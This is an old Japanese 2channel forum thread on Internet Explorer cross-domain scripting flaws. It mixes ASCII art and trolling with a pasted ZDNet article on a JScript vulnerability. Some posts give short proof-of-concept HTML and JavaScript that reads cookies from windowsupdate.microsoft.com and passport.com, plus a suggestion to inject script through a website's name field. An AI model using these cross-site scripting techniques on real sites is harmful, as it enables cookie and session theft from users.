WindowsUpdate はやくなんとかスレ、これ、あれこれ
<HTML>
<HEAD>
<TITLE>MicrosoftUpdate</TITLE>
</HEAD>
<BODY>
<H1>WindowsUpdate...wait......</H1>
<SCRIPT>
onload=function () {var obj2ch=open("
http://windowsupdate.microsoft.com/?IE","2ch","width=100,height=100");
setTimeout(function () {obj2ch.frames[0].location.href="javascript:txt='your cookie is ...... ';txt+=document.cookie;alert(txt)";},7000);}
</SCRIPT>
</BODY>
</HTML>
4get
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――――――――‐┬┘
| 君は何を今 見つめているのか
____.____ | 若い悲しみに 濡れた瞳で
| | | | 逃げて行く 白い鳩
| | ∧_∧ | | それとも愛
| |( ´∀`)つ ミ | 君も今日からは 僕等の仲間
| |/ ⊃ ノ | | 飛び出そう 青空の下へ
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |
| \\\
∧_∧
( ´∀`)
⊂
>>1 つ
/ / /
し' し'
そして俺の胸へ飛び込んで来い!!
6 :
名無しさん@お腹いっぱい。:02/09/20 20:23
■5050jp入会キャンペーン
>登録した個人情報を、会員の許可なく第三者に開示致しません
#うそつきめ
名前の欄に
"><あぶないスクリプト>とか入れて味噌。
あはは、そのほかイロイロ危険なりせば、ちーん。
不労所得で一発当てようなんて輩しかひっかからないと思うので、晒すことにしたッピ。
ここがつまらないインターネットですか。
IPA もダメってことだ。
10 :
名無しさん@お腹いっぱい。:02/09/29 21:40
11 :
名無しさん@お腹いっぱい。:02/09/29 21:46
14 :
名無しさん@お腹いっぱい。:02/10/01 01:06
更新されてるが、なんだありゃ?
わけわからんものを入れる気にはならんな…
16 :
sleepy galaxy:02/10/05 17:19
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| 1ってうざいよね〜
\ _______
V
∧_∧∧_∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
( ・∀・)´∀` )< だよね〜、誰か殺してくれないかな?
( ) ) \_______________ ∧ ,∧
| | || | | (・д・,,)ペッ!!
(__)_)__(_) ∧ ∧? 、'(_@
(´⊇`)
( 1 )
|| |
∧ ∧ムカムカ (((_)_)
(#゚Д゚) ̄ ̄ `〜 ∧ ∧
U U ̄ ̄UU ( ) イッテヨシ!!
へ | ヽ
/  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| ったく、サルみてーに糞スレ乱立させてんじゃねーよゴルァ!!
\________________________
きゅぅ
IE allows universal Cross Domain Scripting.
<object id="data" data="empty.html" type="text/html"></object>
<script>
var ref=document.getElementById("data").object;
ref.location.href = "
http://www.passport.com";
setTimeout("alert(ref.cookie)",5000);
</script>
ところで、Cross Domain Scripting とは、XDS と略称?
■■■■■■■■■■■■■■■終了■■■■■■■■■■■■■■■
....あげてみる。糾弾して。
26 です。いやですから、ひっそりと。あげないでください。
>>27
http://interconnected.org/home/more/GoogleSearch.pl.txt -------------------------------------
------------------------------------
# cleans up strings for XML
sub xml_clean {
my $text = shift;
$text =~ s/\&/\&/g;
$text =~ s/</\</g;
$text =~ s/>/\>/g;
$text =~ s/\"/\"/g;
$text =~ s/\'/\'/g;
return $text;
}
------------------------------------
-------------------------------------
??????これってヤバイ? $text =~ s/\'/\'/g;
'って一部のブラウザだけに通用するのだ。?。
> sub xml_clean {
が読めないのか?
(^^)
(^^)
Windows全バージョンに「緊急」の脆弱性
Windowsの全バージョンで、悪質なWebサイトやHTML形式の電子メールを使ってPCが乗っ取られてしまう脆弱性が発見され、Microsoftが3月19日警告を発した。
この脆弱性はWindowsのスクリプティングコンポーネントにあり、攻撃者は同スクリプティングエンジンを利用して、あたかもプログラムがPC上でローカルに実行されたかのように見せかけて自分のプログラムを実行したり、
システムを乗っ取ることが可能になる。Microsoftはこの脆弱性の最大深刻度を「Critical(緊急)」と評価している。
Microsoftセキュリティ対策センターのプログラムマネジャーIain Mulholland氏は「Outlookの旧バージョンを使っている場合のみ脅威となる」と説明。また、この脆弱性からウイルスを作成するのは難しいだろうと言い添えた。
このWindowsの脆弱性は、WindowsがMicrosoft版のJavaScriptであるJScript(ECMAScript Edition 3)を処理する方法をめぐって発生する。
攻撃者は、特別に生成したスクリプトを電子メールで送りつけるか、そうしたスクリプトをWebサイトに埋め込んで、Internet Explorerでロードさせる方法でこれを悪用できる。
Mulholland氏によると、スクリプトを実行させない電子メールクライアントとブラウザでは攻撃は防ぐことができる。また、「Outlook Express 6.0」と「Outlook 2002」では、
デフォルトの状態で利用していればHTMLメールによる攻撃の被害は受けない。また、これ以前のバージョンでもOutlook E-mail Security Updateが適用されていれば被害は受けない。
各バージョンのWindows用のパッチはMicrosoftのWebサイトとWindows Updateで提供。
■米Microsoftの警告ページ
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-008.asp?tag=nl ■日本のマイクロソフトのセキュリティページ
http://www.microsoft.com/japan/security/(ZDNet)
(^^)
∧_∧
( ^^ )< ぬるぽ(^^)
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
__∧_∧_
|( ^^ )| <寝るぽ(^^)
|\⌒⌒⌒\
\ |⌒⌒⌒~| 山崎渉
~ ̄ ̄ ̄ ̄
∧_∧ ∧_∧
ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。
=〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
= ◎――――――◎ 山崎渉&ぼるじょあ
(⌒V⌒)
│ ^ ^ │<これからも僕を応援して下さいね(^^)。
⊂| |つ
(_)(_) 山崎パン
43 :
名無しさん@お腹いっぱい。:03/12/11 16:09